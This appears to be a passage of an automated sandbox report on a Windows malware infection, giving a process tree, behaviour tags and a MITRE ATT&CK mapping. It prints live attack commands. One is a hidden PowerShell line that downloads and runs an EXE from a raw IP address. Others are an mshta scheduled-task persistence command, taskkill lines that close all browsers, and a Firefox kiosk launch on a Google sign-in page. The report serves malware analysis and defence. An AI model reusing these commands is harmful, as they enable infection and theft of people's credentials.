        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2096,9626069164308692466,692126561428286703,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4848 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:1848
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2096,9626069164308692466,692126561428286703,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4928
- - C:\Users\Admin\AppData\Local\Temp\1091316001\151f9773d5.exe
    "C:\Users\Admin\AppData\Local\Temp\1091316001\151f9773d5.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SendNotifyMessage
    PID:5184
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5984
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2256
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5892
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4028
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2132
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:5448
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:2156
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1976 -parentBuildID 20240401114208 -prefsHandle 1896 -prefMapHandle 1888 -prefsLen 26973 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b1dace8-fae1-4751-8108-1e3031637abf} 2156 "\\.\pipe\gecko-crash-server-pipe.2156" gpu
        6⤵
        
        PID:5504
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2432 -parentBuildID 20240401114208 -prefsHandle 2428 -prefMapHandle 2424 -prefsLen 27893 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f689537-f748-4868-aef8-91ac8431fab7} 2156 "\\.\pipe\gecko-crash-server-pipe.2156" socket
        6⤵
        
        PID:5004
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2876 -childID 1 -isForBrowser -prefsHandle 3004 -prefMapHandle 2716 -prefsLen 22636 -prefMapSize 244628 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d5db114c-8cb5-4625-9afc-1f2b771a91ca} 2156 "\\.\pipe\gecko-crash-server-pipe.2156" tab
        6⤵
        
        PID:1508
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4072 -childID 2 -isForBrowser -prefsHandle 4068 -prefMapHandle 4064 -prefsLen 32383 -prefMapSize 244628 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {80a0cf43-9c9a-486b-bc32-f38c1071d267} 2156 "\\.\pipe\gecko-crash-server-pipe.2156" tab
        6⤵
        
        PID:4012
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4536 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4812 -prefMapHandle 4632 -prefsLen 32383 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f596949e-ab32-498e-a425-922c87f12a1b} 2156 "\\.\pipe\gecko-crash-server-pipe.2156" utility
        6⤵
        Checks processor information in registry
        
        PID:6312
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5080 -childID 3 -isForBrowser -prefsHandle 5124 -prefMapHandle 5144 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a5ec683e-6c34-4250-8e20-0d79378b42b6} 2156 "\\.\pipe\gecko-crash-server-pipe.2156" tab
        6⤵
        
        PID:7032
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5284 -childID 4 -isForBrowser -prefsHandle 5292 -prefMapHandle 5296 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9b6593a7-9c75-4e81-9f97-8482f320de4e} 2156 "\\.\pipe\gecko-crash-server-pipe.2156" tab
        6⤵
        
        PID:7048
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5388 -childID 5 -isForBrowser -prefsHandle 5520 -prefMapHandle 5524 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d668f8c9-4ea7-4708-bac0-2766ec11f774} 2156 "\\.\pipe\gecko-crash-server-pipe.2156" tab
        6⤵
        
        PID:7064
- - C:\Users\Admin\AppData\Local\Temp\1091317001\5e812bac6f.exe
    "C:\Users\Admin\AppData\Local\Temp\1091317001\5e812bac6f.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SendNotifyMessage
    PID:4992
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn 3FugZmaIOcn /tr "mshta C:\Users\Admin\AppData\Local\Temp\C6JzDYaHP.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2496
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn 3FugZmaIOcn /tr "mshta C:\Users\Admin\AppData\Local\Temp\C6JzDYaHP.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3612
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\C6JzDYaHP.hta
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      PID:2948
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ONUIR2J4E5PPRDDLMFMY1EJIOZLABVEQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:748
      - C:\Users\Admin\AppData\Local\TempONUIR2J4E5PPRDDLMFMY1EJIOZLABVEQ.EXE
        
        "C:\Users\Admin\AppData\Local\TempONUIR2J4E5PPRDDLMFMY1EJIOZLABVEQ.EXE"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:7104
- - C:\Users\Admin\AppData\Local\Temp\1091318001\30a0979fbd.exe
    "C:\Users\Admin\AppData\Local\Temp\1091318001\30a0979fbd.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:6592
- - C:\Users\Admin\AppData\Local\Temp\1091319001\5fdc363345.exe
    "C:\Users\Admin\AppData\Local\Temp\1091319001\5fdc363345.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:2680
- - C:\Users\Admin\AppData\Local\Temp\1091320001\d7efae0799.exe
    "C:\Users\Admin\AppData\Local\Temp\1091320001\d7efae0799.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:7020
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      PID:2368
- - C:\Users\Admin\AppData\Local\Temp\1091321001\5a3fcf8817.exe
    "C:\Users\Admin\AppData\Local\Temp\1091321001\5a3fcf8817.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4856
- - C:\Users\Admin\AppData\Local\Temp\1091322001\e0600fa4a5.exe
    "C:\Users\Admin\AppData\Local\Temp\1091322001\e0600fa4a5.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:6328
- - C:\Users\Admin\AppData\Local\Temp\1091323001\ftS1RPn.exe
    "C:\Users\Admin\AppData\Local\Temp\1091323001\ftS1RPn.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:6556
- - C:\Users\Admin\AppData\Local\Temp\1091324001\ebp51gY.exe
    "C:\Users\Admin\AppData\Local\Temp\1091324001\ebp51gY.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:2684
- - C:\Users\Admin\AppData\Local\Temp\1091325001\DF9PCFR.exe
    "C:\Users\Admin\AppData\Local\Temp\1091325001\DF9PCFR.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:6944
  - - C:\Users\Admin\AppData\Local\Temp\1091325001\DF9PCFR.exe
      "C:\Users\Admin\AppData\Local\Temp\1091325001\DF9PCFR.exe"
      4⤵
      PID:748
- - C:\Users\Admin\AppData\Local\Temp\1091326001\uXivbut.exe
    "C:\Users\Admin\AppData\Local\Temp\1091326001\uXivbut.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:1036
- - C:\Users\Admin\AppData\Local\Temp\1091327001\8QQOJj9.exe
    "C:\Users\Admin\AppData\Local\Temp\1091327001\8QQOJj9.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:224
- - C:\Users\Admin\AppData\Local\Temp\1091328001\da79c1018d.exe
    "C:\Users\Admin\AppData\Local\Temp\1091328001\da79c1018d.exe"
    3⤵
    PID:5796
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      PID:2992
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      PID:4656
- - C:\Users\Admin\AppData\Local\Temp\1091329001\b6e3b84d05.exe
    "C:\Users\Admin\AppData\Local\Temp\1091329001\b6e3b84d05.exe"
    3⤵
    PID:2388
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      PID:7004
- - C:\Users\Admin\AppData\Local\Temp\1091330001\7tzlyz8.exe
    "C:\Users\Admin\AppData\Local\Temp\1091330001\7tzlyz8.exe"
    3⤵
    PID:5860
- - C:\Users\Admin\AppData\Local\Temp\1091331001\2e8bd816ec.exe
    "C:\Users\Admin\AppData\Local\Temp\1091331001\2e8bd816ec.exe"
    3⤵
    PID:2488
- - C:\Users\Admin\AppData\Local\Temp\1091332001\0bc8fda9ed.exe
    "C:\Users\Admin\AppData\Local\Temp\1091332001\0bc8fda9ed.exe"
    3⤵
    PID:5244

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:208

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4008

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1148

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5012

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4624

C:\ProgramData\pkihe\agndts.exe
C:\ProgramData\pkihe\agndts.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5012

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5672

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1036

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5676

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Modify Authentication Process

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

Modify Authentication Process

Modify Registry

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion